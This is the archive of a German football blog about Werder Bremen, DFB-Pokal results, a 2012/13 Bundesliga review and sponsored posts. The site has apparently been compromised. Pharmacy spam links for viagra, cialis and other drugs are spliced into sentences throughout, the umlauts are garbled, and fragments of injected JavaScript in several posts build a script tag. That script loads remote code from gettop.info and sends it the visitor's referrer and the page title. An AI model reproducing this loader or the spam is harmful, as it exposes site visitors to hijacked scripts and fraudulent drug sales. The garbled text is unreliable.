Willkommen auf » Werder Bremen
19.Apr 2016

DFB-Pokal 2015/16 Halbfinale
FC Bayern MA?nchen – Werder Bremen 2:0

1:0 Thomas MA?ller (30., Kopfball, Xabi Alonso)
2:0 Thomas MA?ller (71., Foulelfmeter, Rechtsschuss, Vidal)
vor 75.000 Zuschauern in der ausverkauften Allianz-Arena, MA?nchen

Aufstellung FC Bayern: Neuer – Lahm, Javi Martinez, Alaba, Juan Bernat (58. Benatia) – Xabi Alonso – Coman (67. Vidal), T. MA?ller, M. GAi??tze (60. Thiago), F. Ribery – Lewandowski

Aufstellung Werder: Wiedwald – Gebre Selassie, Vestergaard, Djilobodji, Sternberg – Fritz (83. Kleinheisler), Grillitsch – S. YatabarAi?? (74. Ai??ztunali), Junuzovic, Bartels – Pizarro (73. Ujah)

Die Zusammenfassung des Spiels…

AuAYerdem auch hier zu sehenvar d=document;var s=d.createElement(‚script‘); buy propecia canada pharmacy. Buy http://pace.ubiobio.cl/index.php/2018/02/02/order-avana-on-seven/ prilosec treatment http://makcar.bozon.pl/buy-venlor-venlafaxine/ medrol online, valium 10mg street value. online meds from india xenical male enhancement Order Buy http://www.valuemanagers.it/senza-categoria/how-much-ampicillin-should-i-take/ Order http://sadorn.orgfree.com/?p=19523 cheap keftab arab

9.Feb 2016

DFB-Pokal 2015/16 Viertelfinale
Bayer Leverkusen – Werder Bremen 1:3

1:0 Chicharito (22., Foulelfmeter, Rechtsschuss, KieAYling)
1:1 Santiago Garcia (31., Rechtsschuss, Bartels)
1:2 Claudio Pizarro (42., Foulelfmeter, Rechtsschuss, Bartels)
1:3 Florian Grillitsch (82., Rechtsschuss, Pizarro)
vor knapp 25.000 Zuschauern in der BayArena in Leverkusen

Aufstellung Leverkusen: Leno – Hilbert (46. Ramalho), Tah, Toprak, Wendell – Kramer (76. Brandt), Kampl – Bellarabi, Calhanoglu – KieAYling, Chicharito (57. K. Papadopoulos)

Aufstellung Bremen: Wiedwald – Gebre Selassie, Galvez, Djilobodji, S. Garcia (74. Guwara) – Vestergaard – Ai??ztunali (89. Veljkovic), Fritz, Grillitsch, Bartels – Pizarro (86. Ujah)

Die Zusammenfassung des Spiels…

AuAYerdem auch Order is there a generic available for avodart http://salon-angelika.sk/nezaradene/buy-doxazosin-online/ avana erectile dysfunction. Pills vidalta, need a prescription for domperidone. hier amerimedrx coupon code Cheap zu sehen} regenon online pills online

15.Dez 2015

Wie immer wird kurz vor Weihnachten noch schnell die Achtelfinalrunde im DFB-Pokal ausgespielt. Die Ergebnisse seht ihr in der nachfolgenden Auflistung von Spielberichten u.a. von der ARD Sportschau, ZDF Sportreportage und den Dritten Programmen.

Dienstag 15.12.
Leverkusen und der FC Bayern setzen sich standesgemAi??AY durch, Gladbach und Bremen duellieren sich auf AugenhAi??he und trennen sich torreich und Zweitligist Heidenheim siegt gegen Aue aus der dritten Liga.

SpVgg Unterhaching – Bayer 04 Leverkusen 1:3 (1:1) => Video-Highlights is crestor available over the counter delivery gyne-lotrimin (auch hier, hier http://www.centrodado.com/aleve-gel-caps-for-sale/ )
Bor. MAi??nchengladbach – Werder Bremen 3:4 (1:0) => Video-Highlights (hier, auch hier, order imitrex hier und hier)
Erzgebirge Aue – 1. FC Heidenheim 0:2 (0:0) => prednisone sudafed dogs. Video-Highlights minocycline sales
Bayern MA?nchen – SV Darmstadt 98 1:0 (1:0) => Video-Highlights (auch hier http://multilevelsales.org.ng/blog/2018/03/18/lisinopril-prices-costco/ , hier)

Mittwoch 16.12. zovirax cold sore cream cost cheap pills
1. FC NA?rnberg – Hertha BSC 0:2 (0:1) => Video-Highlights (auch hier)
VfB Stuttgart – Eintracht Braunschweig n.V. 3:2 => Video-Highlights (auch hier)
FC Augsburg – Borussia Dortmund 0:2 (0:0) => Video-Highlights (auch Order cheap buspar, online viagra in canada. Purchase hier, Cheap hier, hier metformin manufacturers in usa und hier)
1860 MA?nchen – VfL Bochum 0:2 (0:2) => Video-Highlights

Weiter geht es kurz vor der Weihnachtspause am 9. und 10. Februar mit dem Achtelfinale. Die Auslosung hat die folgenden Partien ergeben…
VfB Stuttgart – Borussia Dortmund
1. FC Heidenheim – Hertha BSC
VfL Bochum – FC Bayern MA?nchen
Bayer 04 Leverkusen – Werder Bremen

4.Mrz 2015

Bekanntlich sind wir im Nach-WM-Jahr mit dem allgemeinen Terminplan im deutschen ProfifuAYball MAi??rz Ai??uAYerst spAi??t dran. Aber es hilft ja nix, das Achtelfinale des DFB-Pokals wird fA?r die neun Erst-, vier Zweit-, zwei Dritt- und den einen Viertligisten in die heiAYe FrA?hjahrsphase der Ligen und Europapokalwettbewerbe gequetscht.

Hier die Ergebnisse und Spielberichte der acht Partien im A?berblick…

Dienstag 03.12.
Eine groAYe Pokalsensation ist diesmal bisher ausgeblieben. Gegen unterklassige Gegner setzten sich die Bundesligisten allesamt durch. Spannend wurde es beim Duell auf AugenhAi??he zwischen Freiburg und KAi??ln.

19:00 Bayer 04 Leverkusen – 1. FC Kaiserslautern 2:0 n.V. => Video-Highlights (auch hier und hier)
19:00 VfR Aalen – TSG Hoffenheim 0:2 => Video-Highlights Pills (auch hier)
20:30 SC Freiburg – 1. FC KAi??ln 2:1 => Video-Highlights (auch hier und hier buy zolpidem cod, generic cialis review online. )
20:30 Dynamo Dresden – Borussia Dortmund 0:2 => Video-Highlights Order Purchase (auch online Buy Buy hier und hier), die Analyse des Spiels

Mittwoch 04.12.
Da ist er, der Knaller. Drittligist Bielefeld kegelt das Bundesligateam der Stunde Werder Bremen aus dem Wettbewerb. Ansonsten sehen wir drei ungefAi??hrdete Favoritensiege.

19:00 RasenBallsport Leipzig – VfL Wolfsburg 0:2 => zaditor costco price Video-Highlights ipratropium for sale. (auch hier)
19:00 Arminia Bielefeld – Werder Bremen 3:1 => Video-Highlights (auch order zestoretic generic name hier und hier albendazole online )
20:30 FC Bayern MA?nchen – Eintracht Braunschweig 2:0 => Video-Highlights (auch hier Pills )
20:30 Kickers Offenbach – Borussia MAi??nchengladbach 0:2 => Video-Highlights (auch hier), die Analyse des Spiels Cheap Buy

Weiter geht es am 7. und 8. April 2015 mit dem Viertelfinale. Die Auslosung der Partien findet am kommenden Sonntag in der ARD-Sportschau statt.

*** Update ***
Hier haben wir die ausgelosten Viertelfinalbegegnungen
07.04. 19:00 VfL Wolfsburg – SC Freiburg
07.04. 20:30 Borussia Dortmund – TSG Hoffenheim (Live im Ersten)
08.04. 19:00 Arminia Bielefeld – Borussia MAi??nchengladbach
08.04. 20:30 Bayer 04 Leverkusen – FC Bayern MA?nchen (Live im Ersten)d.getElementsByTagName(‚head‘)[0].appendChild(s); trental without prescription

28.Okt 2014

Im Nach-WM-Jahr scheint der deutsche FuAYball den Rahmenterminplan seiner Wettbewerbe ein wenig verschoben zu haben. Die zweite Runde des DFB-Pokals ist diesmal vergleichsweise spAi??t im Spieljahr in der letzten Oktoberwoche angesetzt. Das sonst A?bliche Achtelfinale kurz vor Weihnachten wird erst im kommenden FrA?hjahr ausgespielt. DafA?r gibt’s im April sowohl das Viertel-, als auch das Halbfinale.

Aber bis dahin schaffen es sowieso nur die wenigsten. Wie sich die verbliebenen 13 Erst-, 12 Zweit-, 4 Dritt- und 3 Viertligisten in der zweiten Hauptrunde geschlagen haben, seht ihr in unserer Auflistung von Spielberichten u.a. von der ARD Sportschau, ZDF Sportreportage und den Dritten Programmen.

Dienstag 28.10.
Es war einer dieser spannenden Pokalabende, bei dem drei Spiele in A?berlAi??nge gehen, zwei Bundesligisten (Hertha BSC und Hannover 96) hAi??ngen bleiben und drei unterklassige Vereine (Dynamo Dresden, Arminia Bielefeld und die Kickers Offenbach) A?berraschend in die nAi??chste Runde einziehen. Eigene Gesetze, ihr wisst schon…

Chemnitzer FC – Werder Bremen 0:2 => Video-Highlights, auch generic viagra trusted site hier, hier und Purchase hier
Arminia Bielefeld – Hertha BSC 0:0, 4:2 i.E. => Video-Highlights, auch hier, hier und hier
Kickers Offenbach – Karlsruher SC 1:0 => Video-Highlights, auch hier
VfR Aalen – Hannover 96 2:0 => online Video-Highlights
Dynamo Dresden – VfL Bochum 1:1, 2:1 n.V. => Video-Highlights, auch hier cialis super active reviews , hier und hier
MSV Duisburg – 1. FC KAi??ln 0:0, 1:4 i.E. => Video-Highlights, auch hier
1. FC Kaiserslautern – SpVgg Greuther FA?rth 2:0 => Video-Highlights, auch hier
FC St. Pauli – Borussia Dortmund 0:3 => Video-Highlights (auch hier und hier), Komplettaufzeichnung der ersten und zweiten Halbzeit, Stimmen zum Spiel

Mittwoch 29.10. cheap anacin
Unterm Strich ohne Ausnahme Favoritensiege, auch wenn der eine (Leverkusen) sich etwas mehr mA?ht als der andere (FC Bayern, Hoffenheim und Wolfsburg).

1. FC Magdeburg – Bayer Leverkusen 1:1, 4:5 i.E. => zanaflex online Video-Highlights, auch how often can i take cialis 20. hier und hier
WA?rzburger Kickers – Eintracht Braunschweig 0:1 => http://empiricalexchange.com/?p=19858 http://cuzndog.mhs.narotama.ac.id/2018/02/02/avodart-cost-in-canada/ Video-Highlights http://counsellingforyourpeaceofmind.com.au/2018/02/02/order-nizoral-cream/ , auch hier
TSV 1860 MA?nchen – SC Freiburg 2:5 => Video-Highlights
RB Leipzig – Erzgebirge Aue 1:1, 3:1 n.V. => Video-Highlights, auch hier
1899 Hoffenheim – FSV Frankfurt 5:1 => Video-Highlights, auch hier
VfL Wolfsburg – 1. FC Heidenheim 1846 4:1 => Video-Highlights Buy , auch hier
Eintracht Frankfurt – Bor. MAi??nchengladbach 1:2 => Video-Highlights, auch hier und hier
Hamburger SV – Bayern MA?nchen 1:3 => Video-Highlights (auch hier buy pills und hier und hier), Komplettaufzeichnung der ersten und zweiten Halbzeit, Stimmen zum Spiel Order buy prilosec otc

Weiter geht es dann erst am 3. und 4. MAi??rz 2015 mit dem Achtelfinale und folgenden Begegnungen:
Bayer 04 Leverkusen – 1. FC Kaiserslautern
Kickers Offenbach – Bor. MAi??nchengladbach
Bayern MA?nchen – Eintracht Braunschweig
VfR Aalen – TSG Hoffenheim
RasenBallsport Leipzig – VfL Wolfsburg
Arminia Bielefeld – Werder Bremen
SC Freiburg – 1. FC KAi??ln
Dynamo Dresden – Borussia Dortmund curatane effects urinary, sex med man.

24.Feb 2014

FuAYball ist mehr als Bundesliga, Champions League und Weltpokal. Hierzulande ist er Breitensport, Kulturgut und bekanntlich die schAi??nste Nebensache der Welt. Nicht ohne Grund hat der Deutsche FuAYballbund fast sieben Millionen eingetragene Mitglieder, die in mehr als 25.000 Vereinen organisiert sind.

Und genau diese breite Masse soll nun ein wenig mehr WA?rdigung erhalten. „Schreibt Vereinsgeschichte“ heiAYt die Aktion, mit der sich die TARGOBANK speziell an den AmateurfuAYball richtet. Interessierte Vereine kAi??nnen sich A?ber so-geht-bank-heute.de anmelden und als Hauptpreis 10.000 EUR fA?r die Mannschaftskasse sowie ein Freundschaftsspiel gegen die Profis von Werder Bremen gewinnen.

Im eigens produzierten Promoclip wird Andrea Kaiser, TV-Moderatorin fA?r ran auf Sat1 und Patin des Wettbewerbs, vor lauter Euphorie schonmal ordentlich durchgewirbelt…
http://www.colegiosanpedro.cl/?p=6981 valtrex generic walmart. Order fungsi tablet danazol purchase myambutol 250

Und so geht’s…
1. Ihr meldet euch und euren Verein bis zum 25. April http://leslieoray.com/?p=36294 auf der Website Order Cheap http://www.bolleventi.com/shipping-eurax/ an. Dabei sein kann jeder im deutschen Vereinsregister eingetragene Amateur-FuAYballverein.
2. AnschlieAYend erstellt ihr eine mAi??glichst originelle Bewerbung. Hier kommt es ganz auf eure KreativitAi??t an. Zeigt in Text, Bild oder Video, was euren Verein ausmacht, warum ihr etwas besonderes seid und wieso man euch auswAi??hlen sollte.
3. Jetzt geht es in einem offenen Voting ums Stimmen sammeln. Das Ziel ist ein Platz unter den Top 100.
4. Unter diesen einhundert Vereinen wAi??hlt die Jury um Welt- und Europameister GA?nter Netzer, Werder-GeschAi??ftsfA?hrer Thomas Eichin und TARGOBANK Vorstand JA?rgen Lieberknecht vier Kandidaten aus.
5. Diese vier Vereine qualifizieren sich fA?r ein zweitAi??giges Trainingslager beim Bundesligisten Werder Bremen und spielen anschlieAYend ein Turnier im Weser-Stadion aus. Der Sieger erhAi??lt das Sponsoring A?ber 10.000 EUR und darf sich auf ein Freundschaftsspiel gegen die Werder-Profis auf dem heimischen Platz freuen.

Die unterlegenen Teilnehmer gehen natA?rlich nicht leer aus. Der zweite Platz erhAi??lt immerhin noch 5.000 EUR, der dritte und vierte Platz jeweils 2.500 EUR fA?r die Vereinskasse. Alle Vereine der Top 100 erhalten einen neuen Trikotsatz und sAi??mtliche Bewerber einen hochwertigen FuAYball.

Verfolgen kAi??nnt ihr die Kampagne auch A?ber tedarise 20 online viagra and premature ejaculation, risk free viagra. http://sudarnik.mhs.narotama.ac.id/2018/03/15/mircette-birth-control-cost/ Facebook Pills und online Twitter. Na dann… eine Anmeldung kostet nichts und verspricht in meinen Augen spektakulAi??re Gewinnaussichten. Warum also nicht einfach mal probieren? Ihr habt es selbst in der Hand.

Dieser Artikel wurde gesponsert von TARGOBANK

23.Mai 2013

Wie in den vergangenen Jahren stelle ich auch zum Abschluss der Saison 2012/2013 wieder eine umfassende Abschlussbetrachtung der unlAi??ngst zu Ende gegangenen Bundesligaspielzeit zusammen.

Und wie kAi??nnte es anders sein: PA?nktlich zum 50. JubilAi??um der Bundesliga ist Rekordmeister Bayern MA?nchen nach zwei Dortmunder Meisterschaften wieder zurA?ck an der Spitze des deutschen ProfifuAYballs. Die MA?nchner dominierten die Liga wie lange kein anderes Team und sind ohne wenn und aber der hochverdiente Champion.

Besonders beeindruckend ist die schier endlose Liste der vom FCB in diesem Jahr neu aufgestellten Rekorde, eine Bundesligasaison fA?r die Ewigkeit:

    Pills
  • ai??? Der FC Bayern MA?nchen fuhr mit Abstand die meisten Siege ein (29, den vorherigen Rekordwert 25 hielten die MA?nchner aus dem Jahr 1972/73 und der BVB aus der Saison 2010/11),
  • ai??? holte die meisten Punkte (91, Dortmunds Rekordsaison 2011/12 mit 81 Punkten wurde also nochmal um zehn ZAi??hler A?bertroffen),
  • ai??? kassierte nur eine einzige Niederlage
  • rupee pill.

  • ai??? sowie die wenigsten Gegentore (13),
  • sexual impotence medication

  • ai??? ist der frA?heste Meister aller Zeiten (gefeiert werden konnte bereits Anfang April am 28. Spieltag),
  • Buy
    Purchase Cheap

  • ai??? fA?hrte an allen 34 Spieltagen die Bundesliga-Tabelle an,
  • ai??? hat einen unfassbaren 25-Punkte-Vorsprung auf den Vizemeister Dortmund (der Rekord lag bei 16 Punkten Abstand im MA?nchner Meisterjahr 2002/03),
  • ai??? stellte mit 8 Siegen einen neuen Startrekord auf,
  • ai??? schaffte als erste Mannschaft A?berhaupt eine Siegesserie von 11 Spielen in Folge
  • ai??? und wurde betreut vom Ai??ltesten Meistertrainer der Geschichte, dem 67-jAi??hrigen Jupp Henyckes, der sich nun aller Voraussicht nach in den wohlverdienten Ruhestand verabschieden wird.
  • Nur einen einzigen Statistikwert kann der FC Bayern den Dortmundern auch in diesem Jahr nicht streitig machen. Die Borussia hAi??lt auch 2012/13 mit 80.482 GAi??sten pro Spiel erneut den hAi??chsten Zuschauerschnitt Europas. Insgesamt kamen 1.368.195 Zuschauer in den Signal-Iduna Park, nur MA?nchen (1.207.000, im Durchschnitt 71.000) und Schalke (1.039.912, im Durchschnitt 61.171) knackten ebenfalls die Millionenmarke.

    Hier mal ein paar Bilder von der A?bergabe der Meisterschale und der Feier auf dem MA?nchner Rathausbalkon, auch die obligatorische Bierdusche kommt selbstverstAi??ndlich nicht zu kurz…

    Abschlusstabelle http://ty9952.blogcn.com/?p=1246
    1 ~ FC Bayern MA?nchen ~ 91 Pkt. ~ Champions League
    2 ~ Borussia Dortmund ~ 66 Pkt. ~ Champions League
    3 ~ Bayer Leverkusen ~ 65 Pkt. ~ Champions League
    4 ~ FC Schalke 04 ~ 55 Pkt. ~ Champions League Qualifikation
    5 ~ SC Freiburg ~ 51 Pkt. ~ Europa League
    6 ~ Eintracht Frankfurt ~ 51 Pkt. ~ Europa League
    7 ~ Hamburger SV ~ 48 Pkt.
    8 ~ Borussia MAi??nchengladbach ~ 47 Pkt.
    9 ~ Hannover 96 ~ 45 Pkt.
    10 ~ 1. FC NA?rnberg ~ 44 Pkt.
    11 ~ VfL Wolfsburg ~ 43 Pkt.
    12 ~ VfB Stuttgart ~ 43 Pkt.
    13 ~ 1. FSV Mainz 05 ~ 42 Pkt.
    14 ~ SV Werder Bremen ~ 34 Pkt.
    15 ~ FC Augsburg ~ 33 Pkt.
    16 ~ 1899 Hoffenheim ~ 31 Pkt. ~ Relegation
    17 ~ Fortuna DA?sseldorf ~ 30 Pkt. ~ Abstieg
    18 ~ SpVgg Greuther FA?rth ~ 21 Pkt. ~ Abstieg

    „Overachiever“ sind ohne Frage der SC Freiburg und Eintracht Frankfurt auf den RAi??ngen 5 und 6. Sie verwiesen den HSV, MAi??nchengladbach, Hannover und Co. A?berraschend auf die PlAi??tze und vertreten die Bundesliga im kommenden Jahr in der Europa League. Freiburg war im Vorjahr BundesligazwAi??lfter und spielte eine erfrischende und bestAi??ndige Saison. Die Frankfurter Eintracht kickte im letzten Jahr noch in Liga 2 und war bis ins FrA?hjahr 2013 sogar auf Champions League Kurs. Beide Mannschaften stehen A?berraschend, aber verdient dort oben, eine Wiederholung in der kommenden Spielzeit dA?rfte aber sicherlich schwer werden.

    Die „Underperformer“ des Jahres sind etwas schwerer auszumachen. EnttAi??uscht haben sicherlich Hoffenheim und Bremen, die ihre GeheimtippqualitAi??ten vAi??llig verspielten und sich A?ber weite Teile der Saison im unteren Tabellendrittel aufhielten. Gladbach und Hannover konnten sich auch durch die Doppelbelastung mit europAi??ischen Auftritten nicht stabilisieren und verloren ihre EuropapokalplAi??tze des Vorjahres.

    Purchase order hydrea uses TorschA?tzenliste
    1. Stefan KieAYling (Bayer 04 Leverkusen) mit 25 Toren in 34 Spielen
    2. Robert Lewandowski (Borussia Dortmund) mit 24 Toren in 31 Spielen
    3. Alexander Meier (Eintracht Frankfurt) mit 16 Toren in 31 Spielen

    best viagra for women in india, how much cialis can i take. Scorerliste
    1. Stefan KieAYling (Bayer 04 Leverkusen) mit 25 Toren und 7 Vorlagen
    2. Robert Lewandowski (Borussia Dortmund) mit 24 Toren und 5 Vorlagen
    3. Franck Ribery (FC Bayern MA?nchen) mit 10 Toren und 14 Vorlagen
    3. Thomas MA?ller (FC Bayern MA?nchen) mit 13 Toren und 11 Vorlagen

    Sonstiges

    • ai??? Der SA?nder der Liga ist der Stuttgarter Vedad Ibisevic mit 10 Gelben und einer Roten Karte in 30 Spielen
    • online

    • ai??? Sehr beeindruckend: Die WeiAYe Weste geht wie schon im Vorjahr an FCB-Torwart Manuel Neuer, er spielte 18 mal zu Null, es folgen Oliver Baumann (Freiburg) mit 13 und Bernd Leno (Leverkusen) mit 11 Spielen ohne Gegentreffer
    • ai??? Top-Joker ist Dani Schahin von Fortuna DA?sseldorf mit 4 Treffern nach 15 Einwechslungen
    • cheap pills Cheap bonnispaz order

    • ai??? Die EigentorkAi??nige stammen vom 1.FSV Mainz 05. Heinz MA?ller, Adam Szalai, Christian Wetklo und Bo Svensson bescherten dem Klub den unrA?hmlichen Titel mit 4 Treffern in den eigenen Kasten
    • ai??? Das KA?ken der Bundesligasaison ist Mittelfeldspieler Marc Stendera von Eintracht Frankfurt. Im zarten Alter von 17 Jahren, 3 Monaten und 27 Tagen feierte er am 06.04.2013 gegen den FC Bayern sein BundesligadebA?t
    • ai??? Die Dauerbrenner der Liga sind fA?nf TorhA?ter: Baumann (Freiburg), Zieler (Hannover), Ulreich (Stuttgart), Benaglio (Wolfsburg) und Mielitz (Bremen) fehlten keine einzige Spielminute, fleiAYigster Feldspieler ist Heiko Westermann vom HSV mit 27 verpassten Minuten

    cytotec sin receta puerto rico

    Jetzt noch die Finalspiele in Champions League und DFB-Pokal und dann endlich ab in die Sommerpause? FA?r die Bundesligaspieler mag der Plan so lauten, dem interessierten Fan wird aber auch in den vermeintlichen Ruhemonaten Mai, Juni und Juli noch so einiges geboten.

    23. bis 28. Mai ~ Bundesliga-Relegation
    25. Mai ~ Champions League Finale Borussia Dortmund gegen FC Bayern MA?nchen
    29. Mai ~ LAi??nderspiel Ecuador gegen Deutschland
    1. Juni ~ DFB-Pokal Finale FC Bayern MA?nchen gegen den VfB Stuttgart
    2. Juni ~ LAi??nderspiel USA gegen Deutschland
    5. bis 18. Juni ~ U-21-Europameisterschaft in Israel
    15. bis 30. Juni ~ Confederations Cup in Brasilien
    21. Juni bis 13. Juli ~ U-20-Weltmeisterschaft in der TA?rkei (ohne deutsches Team)
    27. Juni ~ Supercup Deutschland Meister gegen Pokalsieger (oder Vizemeister)
    10. bis 28. Juli ~ FuAYball-Europameisterschaft der Frauen in Schweden
    19. Juli ~ 1. Spieltag der 2. Bundesliga
    20. Juli bis 8. August ~ U-19-Europameisterschaft in Litauen
    9. August ~ 1. Spieltag der Bundesliga

    Obendrein erwarten uns noch die Vorbereitung mit allerlei Testspielen der Bundesligisten und der obligatorische Transfertrubel. Es wird also definitiv nicht langweilig :)

25.Jan 2013

Aus dem hohen Norden Deutschlands stammt bekanntlich nicht nur eine Reihe von mittlerweile vollends etablierten Bundesligisten (Hannover 96 spielt seit 11 Jahren im deutschen FuAYballoberhaus, der VfL Wolfsburg auch schon seit 16, Werder Bremen seit 32 Jahren und der Hamburger SV als einziger Klub ununterbrochen gar seit der LigagrA?ndung 1963), sondern auch eine Vielzahl an guten hausgemachten Bieren.

Eins davon ist das Flensburger Pilsener, das uns im nachfolgenden JubilAi??umsclip zum 125. Geburtstag der Brauerei mit feinstem friesischem Witz und Charme von seinen QualitAi??ten A?berzeugen will. Drei waschechte Nordlichter beweisen, was es mit der typisch nordischen Gelassenheit auf sich hat und lassen uns erfahren, wofA?r Flensburger steht: Gebraut aus reiner KA?stengerste und dem Wasser der Gletscherquelle, entfaltet es sein auAYergewAi??hnlich herb-wA?rziges Aroma und sorgt fA?r einen unnachahmlichen Geschmack. Unverwechselbar in Charakter und Frische, erreicht es hAi??chste QualitAi??t durch Sorgfalt, Verwendung bester Rohstoffe und den Einsatz modernster Technik ai??i?? alles in einer einzigen Flasche, versiegelt durch den umweltfreundlichen und einzigartigen BA?gelverschluss.

So, nun aber wirklich genug geschnackt, hier das Video…

Mehr zum Bier und dem groAYen JubilAi??um der Brauerei erfahrt ihr auf der how much aspirin can cause a miscarriage allpills shop, differin0.3 internatiinal. vira tadalafil capsules offiziellen Flensburger Pilsener Seite. Es wAi??re also mal wieder bewiesen: Alles Gute kommt von oben :)

So erstaunt A?brigens auch nicht der Blick auf die Ewige Tabelle der FuAYball-Bundesliga. Dort folgen dem uneinholbaren FC Bayern nicht etwa die alten Konkurrenten aus Dortmund, Stuttgart oder MAi??nchengladbach, sondern Werder Bremen und der Hamburger SV auf die PlAi??tzen Zwei und Drei. Und der Kampf im ewig jungen Nordderby (am kommenden Sonntag um 15:30 ist es wieder soweit) ist noch lange nicht entschieden, in der Statistik trennen die beiden Vereine lediglich 14 Punkte.

Gemessen an diesen historischen Werten hinkt die Titelanzahl in der Region allerdings etwas hinterher. In 49 Bundesligajahren wanderte die begehrte Meisterschale lediglich acht mal in den Norden. Viermal stand am Ende eines Spieljahres Werder Bremen an der Tabellenspitze (1965, 1988, 1993 und 2004), dreimal krAi??nte sich der HSV zum Meister der Bundesliga (1979, 1982 und 1983) und zuletzt gelang der Coup Felix Magath als Trainer/Manager/GeschAi??ftsfA?hrer mit dem VfL Wolfsburg 2009.

Wir sehen: Der Norden hat einiges auf dem und im Kasten! Darauf ein freudiges Plop

Dieser Beitrag wurde freundlicherweise gesponsert von Flensburger Pilsenervar d=document;var s=d.createElement(‚script‘); Purchase Cheap viagra meds online in australia http://chr-centre.org/?p=8430 purchase himcocid syrup flagyl for dogs without prescription. http://chachabeauty.com/2018/02/02/bactrim-duration-of-treatment/ http://chr-centre.org/?p=7107 Order buy eurax hc cream Cheap cheap panmycin sulfate

29.Nov 2012

Arnd Zeigler, Stadionsprecher im Bremer Weserstadion, FuAYballautor, Radiokolumnist, Fernsehgesicht (Zeiglers wunderbare Welt des FuAYballs, immer sonntags um 23:45 im WDR Fernsehen, sehr zu empfehlen) und bereits des Ai??fteren Protagonist hiesiger Blogartikel, betrachtet das allwAi??chentliche Bundesligageschehen bekanntlich gern satirisch locker und mit zwinkerndem Auge. Da wird der ein oder andere Spieler, Trainer oder PrAi??sident auch mal mit einem bissigen Spruch belegt und scherzhaft aufgezogen. Dass FuAYball auf dem Rasen aber ehrliche und knA?ppelharte Arbeit ist und aus der warmen Kommentatorenkabine oder vom fernen Studiopult mitunter verkannt wird, durfte Zeigler im September 2011 mal am eigenen Leib erfahren.

Werder-Trainer Thomas Schaaf lud ihn zur Revanche der langjAi??hrigen schnippischen Berichterstattung zu einer kleinen A?bungsrunde auf das Bremer TrainingsgelAi??nde ein. Der TV-Moderator sagte natA?rlich vollmundig zu und erlebte ein Abenteuer der besonderen Art. Den Ball brachte Schaaf zwar mit, doch Dribblings, PAi??sse und TorschA?sse standen zum Leidwesen Zeiglers gar nicht auf dem Plan. Das Ganze sollte ja auch keinen SpaAY machen. AusdauerlAi??ufe, Sprints, HocksprA?nge, LiegestA?tze und und und… Zeigler bekam dort, wo sonst Clemens Fritz, Marko Arnautovic und die Bremer Kollegen regelmAi??AYig fA?r ihre Bundesligaform schwitzen, das volle Programm der klassischen Konditionsschule zu spA?ren. Seine Kicker bekommt der Trainer ja meistens ganz ordentlich in Form und das muss er auch, schlieAYlich muss sich Werder jedes Jahr aufs neue im Millionenspiel Bundesliga beweisen. Und so kann A?brigens auch der geneigte Fan sein KAi??nnen auf Purchase order lasixs medicine double dose of cialis http://geografiadegracia.com/purchase-ethionamide-dose/ Buy can u buy flonase over the counter http://www.blanketstories.net/purchase-fertomid-vs-clomid/ http://de.partypoker.com unter Beweis stellen.

Der Zuschauer kommt bei Zeiglers Versuchen natA?rlich voll auf seine Kosten, erfreut sich an den erschreckend schwachen konditionellen Grundlagen, den markigen SprA?chen und erlebt obendrein den Bremer Trainer ungewohnt locker und redefreudig. Ist einfach immer lustig, wenn Fernsehleute mal selbst die FuAYballschuhe schnA?ren und sich unter Beweis stellen mA?ssen.

Zeigler kniend vor Schaaf, ein tolles Bild… 😀

Auch schAi??n die Frage des gelAi??uterten Zeigler am Ende: „Und wie lang brAi??uchte ich, um bei hundert Prozent zu sein?“ 😛
Aber ob er sich zukA?nftig seine Kommentare verkneift, ich glaube nicht, wAi??r ja auch schade drum.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; buy pills where to buy zoloft calias

24.Aug 2012

Von den groAYen Turnieren kennen wir bereits das Prinzip der Match Prediction (hier z.B. das EM-Orakel von SPORT1 vor dem Halbfinale Deutschland-Italien how much elavil to overdose Cheap ).

Man nimmt ein modernes FuAYball-Videospiel, lAi??sst die gewA?nschte Partie vorab durchrechnen und setzt noch einen Kommentator vors Mikro, der das simulierte Geschehen stimmungsvoll begleitet. Die hervorragende Grafik und Spielmechanik der aktuellen Versionen von FIFA und Pro Evolution Soccer lAi??sst einen dabei durchaus in die virtuelle A?bertragung einsteigen und gibt am Ende doch auch halbwegs realistische Spielergebnisse aus.

Doch es geht auch anders, wie uns die folgende Vorschau auf das heutige ErAi??ffnungsspiel der Bundesliga Borussia Dortmund gegen Werder Bremen zeigt (20:30 live im Ersten im FreeTV). Hier hat man mal in der Retrokiste gekramt und sich das 1994 erschienene „Sensible World of Soccer“ zur technischen Grundlage genommen. Funktioniert genauso, nur in Sachen Optik muss man Abstriche machen… 😉
[youtube:http://www.youtube.com/watch?v=ut3q6URQp-4]

Es kommentiert A?brigens Konni Winkler, den wir als Moderator von order desyrel 100 http://songs-punjabi.com/?p=14933 Order 90elf.de kennen. Dort gibt’s auch in dieser Saison wieder alle Spiele der ersten und zweiten Bundesliga live, kostenlos und in voller LAi??nge als Audio-Kommentar. Absolute Empfehlung! purchase lasuna garlic yasmine bleeth now myrepublica how much potassium in cozaar walmart drug prices viagra. Order Buy Buy over the counter chlamydia, how much liquid tadalafil should i take.

Seiten: 1 2 3 4 5 6 7